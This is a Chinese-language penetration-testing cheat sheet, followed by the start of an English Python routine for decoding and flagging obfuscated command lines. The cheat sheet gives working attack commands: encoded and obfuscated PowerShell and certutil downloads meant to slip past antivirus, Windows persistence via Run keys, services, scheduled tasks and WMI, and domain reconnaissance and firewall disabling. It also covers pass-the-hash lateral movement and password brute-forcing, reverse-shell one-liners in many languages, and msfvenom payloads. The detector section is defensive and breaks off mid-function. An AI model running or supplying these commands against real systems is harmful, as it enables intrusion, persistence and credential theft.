1328 | ``` 1329 | 快速生成,每条命令用;隔开 1330 | ``` 1331 | //加密echo 1 1332 | powershell -Command "$Text = 'echo 1'; $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text); $EncodedText = [Convert]::ToBase64String($Bytes); $EncodedText" 1333 | ``` 1334 | 1335 | 1336 | base64解码 1337 | ``` 1338 | $EncodedText = "dwByAGkAxxxxxxxxxxxxxxxxxxxAG0AbgB0AG4AJwA=" 1339 | $DecodedText = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedText)) 1340 | $DecodedText 1341 | 1342 | ``` 1343 | 1344 | 1345 | 运行上面base64编码后的命令,编码后的命令,执行火绒会拦截。 1346 | ``` 1347 | powershell -ExecutionPolicy Bypass -nop -w hidden -sta -enc ZQBjAGgAbwAgADEA 1348 | ``` 1349 | 1350 | 不编码执行 1351 | ``` 1352 | powershell -noP -sta -Command "echo 1" 1353 | 1354 | 下面路径必须用/ 1355 | powershell -noP -sta -Command "echo '1'>d:/21fsd.txt" 1356 | 1357 | 绕过执行 1358 | echo|echo|@powershell -c "1>d:/21fsd.txt"|whoami 1359 | 1360 | 绕过 1361 | echo|echo|@powershell -ExecutionPolicy Bypass -c "1>d:/aaaaaaaa.txt"|whoami 1362 | 1363 | 绕过执行策略 1364 | powershell -ExecutionPolicy Bypass -noP -sta -Command "echo '1'>d:/211fsd.txt" 1365 | ``` 1366 | powershell bypass文章 1367 | https://www.netspi.com/blog/technical-blog/network-pentesting/15-ways-to-bypass-the-powershell-execution-policy/ 1368 | 1369 | 1370 | 1371 | ## certutil.exe下载 1372 | 1373 | ``` 1374 | C:\Windows\System32\certutil.exe C:\Users\Public\cer.exe 1375 | ``` 1376 | 1377 | ``` 1378 | certutil.exe -urlcache -split -f http://192.168.1.1/1.exe 1379 | ``` 1380 | 1381 | ``` 1382 | certutil.exe -urlcache -split -f http://192.168.1.1/1.txt 1.exe 1383 | ``` 1384 | 1385 | ``` 1386 | certutil.exe -urlcache -split -f http://192.168.6.27:8012/download/f.ext C:\windows\temp\up.exe &&start C:\windows\temp\up.exe 1387 | ``` 1388 | 1389 | 删除缓存 1390 | 1391 | ``` 1392 | certutil.exe -urlcache -split -f http://192.168.1.1/1.exe delete 1393 | ``` 1394 | 1395 | 查看缓存项目: 1396 | 1397 | ``` 1398 | certutil.exe -urlcache * 1399 | ``` 1400 | 1401 | 转为base64 1402 | 1403 | 
``` 1404 | certutil -encode lcx64.exe lcx64.txt 1405 | ``` 1406 | 1407 | 转回来 1408 | 1409 | ``` 1410 | certutil -decode lcx64.txt lcx64.exe 1411 | ``` 1412 | 1413 | 查看md5 1414 | 1415 | ``` 1416 | certutil -hashfile a.exe MD5 1417 | ``` 1418 | 1419 | bypass 1420 | 1421 | ``` 1422 | Certutil & Certutil –urlcache –f –split url 1423 | Certutil | Certutil –urlcache –f –split url 1424 | ``` 1425 | 1426 | 利用windows的特性,通过" ;@等等符号组合的方式进行混淆执行,发现也能检测到异常行为并拦截。 1427 | ``` 1428 | ;,@certutil&&;,@certutil -u""r""l""c""a""c""h""e"" -split -f http://192.168.xx.xx:7000/test.txt 1429 | 1430 | ;,@certutil -u""r""l""c""a""c""h""e"" -split -f http://192.168.xx.xx:7000/a.exe -DeleteHelloContainer 1431 | 1432 | cer^t^u^til -url""""cache -a -sp""""lit -f http://192.168.xx.xx:8080/xx.txt 1433 | 1434 | certutil -url""""cache -split -f http://192.168.xx.xx:7070/test.txt 1435 | cert^u^t^il -url""""cache -sp""""lit -f http://192.168.xx.xx:7070/test.txt 1436 | ``` 1437 | 1438 | 1439 | 换路径 1440 | ``` 1441 | copy c:\windows\system32\certutil.exe a.exe 1442 | a.exe -urlcache -split -f http://192.168.xx.xx:7000/gdut.txt 1443 | ``` 1444 | 1445 | ## bitsadmin 1446 | 1447 | **不支持https、ftp协议,php python带的服务器会出错** 1448 | 1449 | ``` 1450 | bitsadmin /transfer n http://192.168.1.1/1.exe C:\test\update\1.exe 1451 | ``` 1452 | 1453 | ## wget 下载文件 1454 | 下载到指定目录 1455 | ``` 1456 | wget -P /tmp http://127.0.0.1:8088/aliyun 1457 | ``` 1458 | 1459 | ## curl 下载 1460 | 使用内置option:-o(小写) 1461 | ``` 1462 | curl -o dodo1.jpg http:www.linux.com/dodo1.JPG 1463 | ``` 1464 | 使用内置option:-O(大写) 1465 | ``` 1466 | curl -O http://www.linux.com/dodo1.JPG 1467 | ``` 1468 | 1469 | 下载后,上线 1470 | ``` 1471 | chmod +x /tmp/aliyun&&/tmp/aliyun 1472 | ``` 1473 | 1474 | 1475 | ## windows权限维持 1476 | 1477 | ### Startup目录 1478 | ``` 1479 | NT6以后的目录如下: 1480 | 1481 | 对当前用户有效: 1482 | C:\Users\Username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 1483 | 对所有用户有效: 1484 | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp 
1485 | NT6以前的目录如下: 1486 | 1487 | 对当前用户有效: 1488 | C:\Documents and Settings\Hunter\「开始」菜单\程序\启动 1489 | 对所有用户有效: 1490 | C:\Documents and Settings\All Users\「开始」菜单\程序\启动 1491 | 1492 | ``` 1493 | ### 注册键 1494 | 1495 | ``` 1496 | reg add "XXXX" /v evil /t REG_SZ /d "[Absolute Path]\evil.exe" 1497 | ``` 1498 | 1499 | ``` 1500 | 1.Load注册键 1501 | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\load 1502 | 1503 | 2.Userinit注册键 1504 | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit 1505 | 通常该注册键下面有一个userinit.exe。该键允许指定用逗号分隔的多个程序,如userinit.exe,evil.exe。 1506 | 1507 | 3.Explorer\Run注册键 1508 | Explorer\Run键在HKEY_CURRENT_USER和HKEY_LOCAL_MACHINE下都有。 1509 | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 1510 | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 1511 | Explorer\Run键在HKEY_CURRENT_USER和HKEY_LOCAL_MACHINE下都有。 1512 | 1513 | 4.RunServicesOnce注册键 1514 | RunServicesOnce注册键用来启动服务程序,启动时间在用户登录之前,而且先于其他通过注册键启动的程序,在HKEY_CURRENT_USER和HKEY_LOCAL_MACHINE下都有。 1515 | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce 1516 | HKEY_LOCAL_MACHINE\Software\Microsoft\ Windows\CurrentVersion\RunServicesOnce 1517 | 1518 | 5.RunServices注册键 1519 | RunServices注册键指定的程序紧接RunServicesOnce指定的程序之后运行,但两者都在用户登录之前。 1520 | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ RunServices 1521 | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion\RunServices 1522 | 1523 | 6.RunOnce\Setup注册键 1524 | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup 1525 | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup 1526 | 1527 | 7.RunOnce注册键 1528 | 安装程序通常用RunOnce键自动运行程序,它的位置在 1529 | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce 1530 | [小于NT6]HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx 1531 | 
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 1532 | HKEY_LOCAL_MACHINE下面的RunOnce键会在用户登录之后立即运行程序,运行时机在其他Run键指定的程序之前;HKEY_CURRENT_USER下面的RunOnce键在操作系统处理其他Run键以及“启动”文件夹的内容之后运行。 1533 | 1534 | 8.Run注册键 1535 | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 1536 | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run 1537 | Run是自动运行程序最常用的注册键,HKEY_CURRENT_USER下面的Run键紧接HKEY_LOCAL_MACHINE下面的Run键运行,但两者都在处理“启动”文件夹之前。 1538 | ``` 1539 | 1540 | ### 服务 1541 | ``` 1542 | sc create evil binpath= "cmd.exe /k [Absolute Path]evil.exe" start= "auto" obj= "LocalSystem" 1543 | ``` 1544 | 1545 | ### 计划任务 1546 | 1547 | ``` 1548 | SCHTASKS /Create /RU SYSTEM /SC ONSTART /RL HIGHEST /TN \Microsoft\Windows\evil\eviltask /TR C:\Users\hunter\Desktop\evil.exe 1549 | ``` 1550 | 1551 | ### WMI事件 1552 | 1553 | ``` 1554 | wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="evil", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 310" 1555 | 1556 | wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="evilConsumer", ExecutablePath="C:\Users\hunter\Desktop\beacon.exe",CommandLineTemplate="C:\Users\hunter\Desktop\beacon.exe" 1557 | 1558 | wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"evil\"", Consumer="CommandLineEventConsumer.Name=\"evilConsumer\"" 1559 | 1560 | ``` 1561 | 1562 | ### 屏幕保护 1563 | 1564 | ``` 1565 | reg add "hkcu\control panel\desktop" /v SCRNSAVE.EXE /d C:\Users\hunter\Desktop\beacon.exe /f 1566 | reg add "hkcu\control panel\desktop" /v ScreenSaveActive /d 1 /f 1567 | reg add "hkcu\control panel\desktop" /v ScreenSaverIsSecure /d 0 /f 1568 | reg add "hkcu\control panel\desktop" /v ScreenSaveTimeOut /d 60 /f 1569 | ``` 1570 | 1571 | ### 
bitsadmin 1572 | ``` 1573 | bitsadmin /create evil 1574 | bitsadmin /addfile evil "C:\Users\hunter\Desktop\beacon.exe" "C:\Users\hunter\Desktop\beacon.exe" 1575 | bitsadmin.exe /SetNotifyCmdLine evil "C:\Users\hunter\Desktop\beacon.exe" NUL 1576 | bitsadmin /Resume evil 1577 | ``` 1578 | 1579 | ### Netsh白加黑 1580 | 1581 | ``` 1582 | 可以通过导入helperdll的方式做权限维持,命令格式如下: 1583 | netsh add helper [Absolute evil DLL path] 1584 | 但是由于netsh并不会开启自启动,因此还要再写一条自启动项: 1585 | reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "cmd /c C:\Windows\System32\netsh" 1586 | 重新启动后依然可获得shell: 1587 | ``` 1588 | 1589 | ### MSDTC 1590 | 1591 | 在默认的Windows安装中,System32文件夹中缺少oci.dll这个文件,在获得写权限的情况下可以在该文件夹下写入一个同名的dll,服务启动时执行恶意代码。 1592 | 默认情况下,由于启动类型设置为“手动”,通过以下命令设置自启: 1593 | ``` 1594 | sc qc msdtc 1595 | sc config msdtc start= auto 1596 | 1597 | ``` 1598 | 1599 | 1600 | ## windows信息收集常用命令 1601 | ``` 1602 | Systeminfo 计算机详细信息(补丁信息) 1603 | 1604 | Net start 所启动的服务 1605 | 1606 | Wmic service list brief 查询本机服务信息 1607 | 1608 | Tasklist 进程列表 1609 | 1610 | Wmic startup get command,caption 查看启动该程序信息 1611 | 1612 | Schtasks /query /fo LIST /v计划任务 1613 | 1614 | Netstat -ano 根据本机端口开放情况来判断有什么服务、其角色 1615 | 1616 | Query user || qwinsta 查看当前在线用户 1617 | 1618 | Net session 列出会话 1619 | 1620 | Net share 查看本机的共享列表 1621 | 1622 | Wmic share get name,path,status 查看共享列表 1623 | 1624 | Net user 本地用户 1625 | 1626 | Net user kkkk 查看本地用户信息 1627 | 1628 | 1629 | Net localgroup 本地用户组 1630 | 1631 | Net localgroup /domain 域用户组 1632 | 1633 | Net localgroup adminnstrators 本地管理员组成员 1634 | 1635 | net localgroup adminstrators /domain 查看登陆过主机的管理员 1636 | 1637 | Wmic useraccount get /all 获取域内用户详细信息 1638 | 1639 | dsquery user 查看存在的用户 1640 | 1641 | Net user /domain 域用户信息 1642 | 1643 | Net user kkkk /domain 域用户kkkk信息 1644 | 1645 | Net user kent password /add /domain添加域用户 1646 | 1647 | 1648 | Net group /domain 域用户组信息 1649 | 1650 | Net view /domain 查询域 1651 | 1652 | Net view /domain:test 查询域内计算机 1653 
| 1654 | Net accounts /domain 查询域中密码策略 1655 | 1656 | Net group /domain 查看域内所有用户组 1657 | 1658 | Net group "Domain Controllers" /domain 查看域控制器组 1659 | 1660 | Net group "Domain computers" /domain 查看域内所有计算机列表 1661 | 1662 | Net group "Domain admins" /domain 查看域内管理员用户 1663 | 1664 | Net user /domain kent active:yes 启用域账户 1665 | 1666 | Net user /domain kent active:no 禁用域账户 1667 | 1668 | Nltest /DCLIST:test 查看域中域控制器名 1669 | 1670 | Wmic useraccount get /all 用户详细信息 1671 | 1672 | Net group "Domain Admins" /domain 对应组下的账户信息 1673 | 1674 | nltest /domain_trusts 获取域信任信息 1675 | 1676 | net config workstation 了解本机的配置信息 1677 | 1678 | Netsh firewall show config 查看防火墙配置 1679 | 1680 | Netsh advfirewall set allprofiles state off关闭防火墙(windows server 2003后) 1681 | 1682 | Netsh advfirewall firewall add rule name="pass nc" dir=in action=allow program="C:\nc.exe" 允许指定程序进入(windows server 2003后) 1683 | 1684 | Netsh advfirewall firewall add rule name="allow nc" dir=out action=allow program="C:\nc.exe"允许指定程序退出(windows server 2003后) 1685 | 1686 | Netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow 允许3389连接(windows server 2003后) 1687 | 1688 | Reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"查看端口代理配置信息 1689 | 1690 | Reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /V PortNumber 查看远程桌面端口号 1691 | 1692 | ``` 1693 | 1694 | ## at&schtasks&sc横向 1695 | 1696 | 使用明文密码登录到目标,需要445和139端口开启: 1697 | ``` 1698 | net use \\192.168.2.148\ipc$ password /user:test\administrator 1699 | 1700 | net use \\192.168.2.148\ipc$ password /user:administrator 1701 | 1702 | 复制文件 1703 | copy c:\1.exe \\192.168.2.148\c$ 1704 | 1705 | at新建10:10分运行的定时作业 1706 | at \\192.168.2.148 10:10 c:\1.exe 1707 | 1708 | Windows server 2012及以上使用schtasks命令 1709 | Schtasks /create /s 192.168.2.148 /ru “SYSTEM” /tn executefile /sc DAILY /tr c:/1.exe /F 1710 | Schtasks /run /s 192.168.2.148 /tn executefile /i 
1711 | Schtasks /delete /s 192.168.2.148 /tn executefile /f 1712 | 1713 | sc \\192.168.210.107 create hacker binpath="c:\shell1.exe" #创建服务 1714 | sc \\192.168.210.107 start hacker #启动hacker服务 1715 | ``` 1716 | 1717 | ## impacket包横向命令 1718 | 1719 | 下载https://github.com/maaaaz/impacket-examples-windows 1720 | https://github.com/ropnop/impacket_static_binaries/releases 1721 | Atexec 1722 | ``` 1723 | 需要445端口开启 1724 | Atexec.exe hacker/administrator:abc123@192.168.202.148 "whoami" 1725 | 1726 | Atexec.exe -hashes :fac5d668099409cb6fa223a32ea493b6 hacker/administrator@192.168.202.148 "whoami" 1727 | ``` 1728 | 1729 | 1730 | dcomexec 1731 | ``` 1732 | 需要135端口开启 1733 | dcomexec.exe hacker/administrator:abc123@192.168.202.148 "whoami" 1734 | 1735 | dcomexec.exe -hashes :fac5d668099409cb6fa223a32ea493b6 hacker/administrator@192.168.202.148 "whoami" 1736 | ``` 1737 | 1738 | psexec 1739 | ``` 1740 | 官方Psexec第一种利用方法:可以先有ipc链接,再用psexec运行相应的程序: 1741 | Net use \192.168.202.148\ipc$ zxcvbnm123 /user:test\Administrator 1742 | Psexec \192.168.202.148 -accepteula -s cmd 1743 | 1744 | 官方Psexec第二种利用方法:不用建立ipc连接,直接使用密码或hash进行传递 1745 | Psexec \192.168.202.148 -u Administrator -p zxcvbnm123 -s cmd 1746 | 1747 | PsExec -hashes :fac5d668099409cb6fa223a32ea493b6 test.com/Administrator@192.168.202.148 "whoami" (官方提供的exe执行不了) 1748 | ``` 1749 | 1750 | smbexec 1751 | ``` 1752 | 需要445端口开启 1753 | Smbexec test/Administrator:zxcvbnm123@192.168.202.148 1754 | Smbexec -hashes :fac5d668099409cb6fa223a32ea493b6 test/Administrator@192.168.202.148 1755 | ``` 1756 | 1757 | wmi 1758 | ``` 1759 | WMI利用135端口,支持明文和hash两种方式进行身份验证,且系统日志不记录。 1760 | 第一种:使用系统自带的WMIC明文传递执行相应命令,但执行的结果不回显(先管理员账户登录) 1761 | Wmic /node:192.168.202.148 /user:Administrator /password:zxcvbnm123 process call create "cmd.exe /c ipconfig >C:/1.txt" 1762 | 1763 | 第二种:使用系统自带cscript明文传递执行反弹shell,执行结果有回显,现已被杀 1764 | Cscript //nologo wmiexec.vbs /shell 192.168.202.148 Administrator zxcvbnm123 1765 | 1766 | 
第三种:使用第三方impacket套件中的Wmiexec进行明文或hash传递,执行结果有回显 1767 | Wmiexec test/Administrator:zxcvbnm123@192.168.202.148 "whoami" 1768 | Wmiexec -hashes :fac5d668099409cb6fa223a32ea493b6 test/Administrator@192.168.202.148 "whoami" 1769 | 1770 | ``` 1771 | 1772 | 批量操作,需要保存为bat执行 1773 | ``` 1774 | 用已知密码和用户,批量连接ip: 1775 | FOR /F %%i in (ips.txt) do net use \%%i\ipc$ “password” /user:hacker\administrator 1776 | 1777 | 已知用户和ip,批量连接密码(爆破密码): 1778 | FOR /F %%i in (pass.txt) do net use \192.168.202.148\ipc$ "%%i" /user:test\administrator 1779 | 1780 | 已知用户和ip,批量连接hash(爆破hash): 1781 | FOR /F %%i in (hash.txt) do atexec.exe -hashes :"%%i" test/administrator@192.168.202.148 "whoami" 1782 | ``` 1783 | 精准批量法 1784 | ``` 1785 | shell for /l %i in (1,1,253) do echo 172.22.13.%i >>tip.txt 1786 | shell for /f %i in (tip.txt) do ping -n 1 -w 10 %i | find /i "ttl" >nul && echo %%i >>ok.tx 1787 | shell for /f %i in (ok.txt) do dir \\%i\c$\users >>result.txt 1788 | ``` 1789 | 1790 | cme 批量 1791 | ``` 1792 | proxychains4 ./cme smb 10.0.0.1/24 -u administrator -H 31d6cfe0d16ae931b73c59d7e0c089c0 -d xx.org -x "net user" 1793 | ``` 1794 | 1795 | 单独执行命令 1796 | ``` 1797 | crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami 1798 | ``` 1799 | ldap喷洒 1800 | ``` 1801 | cme ldap 10.11.12.211 -u 'username' -p 'password' --kdcHost 10.11.12.211 --users 1802 | ``` 1803 | 1804 | 1805 | ## 反弹shell(流量太敏感,尽量加密用) 1806 | 1807 | ## nc 1808 | 1809 | ``` 1810 | nc -lvvp 4444 1811 | ``` 1812 | 1813 | ## bash 1814 | 1815 | ``` 1816 | bash -i >& /dev/tcp/172.16.1.130/4444 0>&1 1817 | exec 5<>/dev/tcp/172.16.1.130/4444;cat <&5|while read line;do $line >&5 2>&1;done 1818 | ``` 1819 | 1820 | ## perl 1821 | 1822 | ``` 1823 | perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 1824 | ``` 1825 | 1826 | ## python 1827 | 1828 | ``` 1829 | python -c 
'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.31.41",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 1830 | ``` 1831 | 1832 | ## php 1833 | 1834 | ``` 1835 | php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' 1836 | ``` 1837 | 1838 | ## ruby 1839 | 1840 | ``` 1841 | ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' 1842 | ``` 1843 | 1844 | ## nc 1845 | 1846 | ``` 1847 | nc -e /bin/sh 10.0.0.1 1234 1848 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f 1849 | nc x.x.x.x 8888|/bin/sh|nc x.x.x.x 9999 1850 | ``` 1851 | 1852 | ## java 1853 | 1854 | ``` 1855 | r = Runtime.getRuntime() 1856 | p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) 1857 | p.waitFor() 1858 | ``` 1859 | 1860 | ## lua 1861 | 1862 | ``` 1863 | lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');" 1864 | ``` 1865 | 1866 | ## powershell 1867 | 1868 | ``` 1869 | powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 172.16.1.130 -port 4444 1870 | ``` 1871 | 1872 | ## 加密shell 1873 | ``` 1874 | mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.0.100:2333 > /tmp/s; rm /tmp/s 1875 | 1876 | ``` 1877 | 1878 | # msf大全 1879 | 1880 | 1881 | 1882 | https://xz.aliyun.com/t/2536 1883 | 1884 | https://www.freebuf.com/articles/web/270456.html 1885 | 1886 | https://saucer-man.com/information_security/79.html 1887 | 1888 | https://www.anquanke.com/post/id/235631 1889 | 1890 | https://www.anquanke.com/post/id/164525 1891 | 1892 | 1893 | 1894 | ## 安装 
1895 | 1896 | 安装 1897 | 1898 | ```bash 1899 | # 安装 1900 | curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall 1901 | 安装目录 1902 | # /opt/metasploit-framework/embedded/framework/ 1903 | ``` 1904 | 1905 | 安装2 1906 | ``` 1907 | wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run 1908 | chmod +x ./metasploit-latest-linux-x64-installer.run 1909 | ./metasploit-latest-linux-x64-installer.run 1910 | ``` 1911 | 1912 | payload生成 1913 | 1914 | Linux 1915 | 1916 | ```bash 1917 | 反向连接: 1918 | msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=808 -f elf > shell.elf 1919 | 正向连接: 1920 | msfvenom -p linux/x64/meterpreter/bind_tcp LHOST=127.0.0.1 LPORT=808 -f elf > shell.elf 1921 | ``` 1922 | 1923 | Windows 1924 | 1925 | ```bash 1926 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=808 -f exe > shell.exe 1927 | ``` 1928 | 1929 | Mac 1930 | 1931 | ```bash 1932 | msfvenom -p osx/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=808 -f macho > shell.macho 1933 | ``` 1934 | 1935 | PHP 1936 | 1937 | ```bash 1938 | msfvenom -p php/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=808 -f raw > shell.php 1939 | cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php 1940 | ``` 1941 | 1942 | ASP 1943 | 1944 | ```bash 1945 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=808 -f asp > shell.asp 1946 | ``` 1947 | 1948 | JSP 1949 | 1950 | ```bash 1951 | msfvenom -p java/jsp_shell_reverse_tcp LHOST=127.0.0.1 LPORT=808 -f raw > shell.jsp 1952 | ``` 1953 | 1954 | WAR 1955 | 1956 | ```bash 1957 | msfvenom -p java/jsp_shell_reverse_tcp LHOST=127.0.0.1 LPORT=808 -f war > shell.war 1958 | ``` 1959 | 1960 | 执行方式:将shell.php放在web目录下,使用浏览器访问,或者使用以下命令执行: 1961 | 1962 | ```bash 1963 | php shell.php 1964 | ``` 1965 | 1966 | 3.脚本shell 1967 | 1968 | Python 1969 | 1970 | ```bash 1971 | 
msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=808 -f raw > shell.py 1972 | ``` 1973 | 1974 | Bash 1975 | 1976 | ```bash 1977 | msfvenom -p cmd/unix/reverse_bash LHOST=127.0.0.1 LPORT=808 -f raw > shell.sh 1978 | ``` 1979 | 1980 | Perl 1981 | 1982 | ```bash 1983 | msfvenom -p cmd/unix/reverse_perl LHOST=127.0.0.1 LPORT=808 -f raw > shell.pl 1984 | ``` 1985 | 1986 | 执行方式:复制shell.py中的内容在linux命令行下执行: 1987 | 1988 | ``` 1989 | python -c "exec('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zICAgICAgOyAgICBob3N0PSIxOTIuMTY4Ljg4LjEyOCIgICAgICA7ICAgIHBvcnQ9NDQ0NCAgICAgIDsgICAgcz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkgICAgICA7ICAgIHMuY29ubmVjdCgoaG9zdCxwb3J0KSkgICAgICA7ICAgIG9zLmR1cDIocy5maWxlbm8oKSwwKSAgICAgIDsgICAgb3MuZHVwMihzLmZpbGVubygpLDEpICAgICAgOyAgICBvcy5kdXAyKHMuZmlsZW5vKCksMikgICAgICA7ICAgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))" 1990 | ``` 1991 | 1992 | 4.shellcode 1993 | Linux Based Shellcode 1994 | 1995 | ```bash 1996 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=808 -f 1997 | ``` 1998 | 1999 | Windows Based Shellcode 2000 | 2001 | ```bash 2002 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=808 -f 2003 | ``` 2004 | 2005 | Mac Based Shellcode 2006 | 2007 | ```bash 2008 | msfvenom -p osx/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=808 -f 2009 | ``` 2010 | 2011 | ## Meterpreter基本命令 2012 | 2013 | 首先需要先获取meterpreter: 2014 | 2015 | ```bash 2016 | use exploit/multi/handler 2017 | set payload windows/meterpreter/reverse_tcp 2018 | #set payload linux/x64/meterpreter/reverse_tcp 2019 | set LHOST 0.0.0.0 2020 | set lPORT 6789 2021 | set ExitOnSession false 2022 | exploit -j -z # -j(计划任务下进行攻击,后台) -z(攻击完成不遇会话交互) 2023 | jobs # 查看后台攻击任务 2024 | kill # 停止某后台攻击任务 2025 | sessions -l # (查看会话) 2026 | sessions -i 2 # 选择会话 2027 | sessions -k 2 # 结束会话 2028 | ``` 2029 | 2030 | 如果先获取了cmd,比如利用ms17-010,默认使用的payload返回的就是cmd。这时候我们可以使用`sessions-u 2`来将cmdshell升级成meterpreter。 2031 | 2032 | 
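The PowerShell `-enc` encoding section, the obfuscated certutil command lines in the certutil section, and the msfvenom `python -c "exec('...'.decode('base64'))"` launcher above all hide the real command inside an encoded or mangled command line, and that is exactly what a triage analyst has to undo when such a line shows up in process telemetry. The following Python is an added example, not code from the original cheat sheet: it normalizes a captured command line (stripping cmd.exe `^` escapes, empty `""` pairs and leading `;,@`), decodes `-enc`/`-EncodedCommand` (UTF-16LE base64) and `exec(...decode('base64'))` payloads, and reports which indicator families were hit. The function names, the indicator families and all sample command lines are constructed for this example; the one base64 value that is not constructed, `ZQBjAGgAbwAgADEA`, is the page's own and decodes to `echo 1`.

```python
import base64
import re

# Cheap cmd.exe obfuscations seen in the certutil "bypass" section: "^" is the
# cmd.exe escape character and "" is an empty string that splits a keyword
# without changing what the program actually receives.
CARET_RE = re.compile(r"\^")
EMPTY_QUOTES_RE = re.compile(r'(?:"")+')
LEADING_JUNK_RE = re.compile(r"^[;,@\s]+")

# powershell -enc / -EncodedCommand (and the prefixes PowerShell accepts) followed by base64
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\b\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)
# python -c "exec('<base64>'.decode('base64'))" launcher of the kind msfvenom emits
PY_B64_RE = re.compile(r"exec\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\.decode\(['\"]base64['\"]\)")

# Indicator families (constructed for this example), matched against the
# normalized command line and against every decoded payload.
INDICATORS = {
    "download-cradle": re.compile(r"DownloadString|DownloadFile|\bIEX\b|Invoke-Expression", re.IGNORECASE),
    "reverse-shell": re.compile(r"\.connect\(\(|/dev/tcp/|os\.dup2|/bin/(?:ba)?sh", re.IGNORECASE),
    "lolbin-download": re.compile(r"certutil.*-urlcache|bitsadmin\s+/transfer", re.IGNORECASE),
    "defender-exclusion": re.compile(r"Add-MpPreference", re.IGNORECASE),
    "hidden-window": re.compile(r"-w\s+hidden", re.IGNORECASE),
}


def normalize_cmdline(cmdline):
    # cer^t^u^til -url""""cache  ->  certutil -urlcache ; ;,@certutil -> certutil
    text = CARET_RE.sub("", cmdline)
    text = EMPTY_QUOTES_RE.sub("", text)
    return LEADING_JUNK_RE.sub("", text)


def decode_powershell_enc(b64):
    """-EncodedCommand is base64 over UTF-16LE text, which is why a plain
    base64 decoder shows a NUL byte between every character."""
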